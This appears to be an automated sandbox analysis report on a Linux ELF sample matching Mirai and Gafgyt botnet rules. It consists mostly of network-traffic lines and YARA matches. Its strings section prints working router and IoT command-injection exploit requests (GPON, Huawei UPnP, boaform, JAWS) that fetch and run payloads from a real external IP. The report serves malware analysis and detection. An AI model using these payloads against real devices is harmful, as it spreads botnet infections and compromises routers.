          Source: unknownNetwork traffic detected: HTTP traffic on port 56336 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36042
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
          Source: unknownNetwork traffic detected: HTTP traffic on port 32794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52982
          Source: unknownNetwork traffic detected: HTTP traffic on port 55370 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45024 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40538
          Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59142
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42714
          Source: unknownNetwork traffic detected: HTTP traffic on port 45200 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46652 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35516 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34412 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54580 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58290
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53328
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33718
          Source: unknownNetwork traffic detected: HTTP traffic on port 41488 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54654
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55502
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39026
          Source: unknownNetwork traffic detected: HTTP traffic on port 45506 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33710
          Source: unknownNetwork traffic detected: HTTP traffic on port 48314 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53326
          Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46374 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32870
          Source: unknownNetwork traffic detected: HTTP traffic on port 52662 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47344 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
          Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49640 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 32954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43990
          Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55518
          Source: unknownNetwork traffic detected: HTTP traffic on port 48624 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54664
          Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57146 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55516
          Source: unknownNetwork traffic detected: HTTP traffic on port 41808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49292
          Source: unknownNetwork traffic detected: HTTP traffic on port 37530 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42658
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54672
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53340
          Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52284 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
          Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60340 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54674
          Source: unknownNetwork traffic detected: HTTP traffic on port 53426 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
          Source: unknownNetwork traffic detected: HTTP traffic on port 35520 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55264 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41316
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54680
          Source: unknownNetwork traffic detected: HTTP traffic on port 60066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48636 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37692 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47356 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
          Source: unknownNetwork traffic detected: HTTP traffic on port 36686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53242 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55148 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37292
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55536
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
          Source: unknownNetwork traffic detected: HTTP traffic on port 57996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41636 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47094
          Source: unknownNetwork traffic detected: HTTP traffic on port 47494 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33122 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39478
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57712
          Source: unknownNetwork traffic detected: HTTP traffic on port 42344 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54204
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56872
          Source: unknownNetwork traffic detected: HTTP traffic on port 45334 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42638
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52030
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42632
          Source: unknownNetwork traffic detected: HTTP traffic on port 41316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55550 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42634
          Source: unknownNetwork traffic detected: HTTP traffic on port 51532 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40608 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43562
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55946
          Source: unknownNetwork traffic detected: HTTP traffic on port 35210 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35938
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55948
          Source: unknownNetwork traffic detected: HTTP traffic on port 36662 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34606
          Source: unknownNetwork traffic detected: HTTP traffic on port 43476 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52432
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
          Source: unknownNetwork traffic detected: HTTP traffic on port 46604 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
          Source: unknownNetwork traffic detected: HTTP traffic on port 42044 -> 443

          System Summary

          barindex
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5432, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5446, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5460, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k/proc//proc/%d/exewgetcurlping/pswiresharktcpdumppythoniptablesnanonvimgdb/proc/maps/fd/proc/net/tcp/bin/systemd/bin/watchdog/bin/busybox/var/SofiamkdirtouchechoHTTPetherapegittelnetdsshdmysqlddropbearencoderpgrepyumtftpftpgetrebootpoweroffshutdownnetcatapt/usr/bin/usr/ftp/usr/sbinusrrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.205.214.35 -l /tmp/.matrix -r /mips; /bin/busybox chmod 777 * /tmp/.matrix; /tmp/.matrix)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0POST /HNAP1/ HTTP/1.0
          Source: Initial samplePotential command found: GET /
          Source: Initial samplePotential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d
          Source: Initial samplePotential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&sessionKey=1039230114'$ HTTP/1.1
          Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
          Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
          Source: Initial samplePotential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
          Source: Initial samplePotential command found: GET /index.php?s=/index/hink
          Source: Initial samplePotential command found: GET /%s HTTP/1.0
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 792, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 936, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 1944, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 3181, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 3185, result: successfulJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5459)SIGKILL sent: pid: 5461, result: successfulJump to behavior
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: AFWaD3vnqR.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
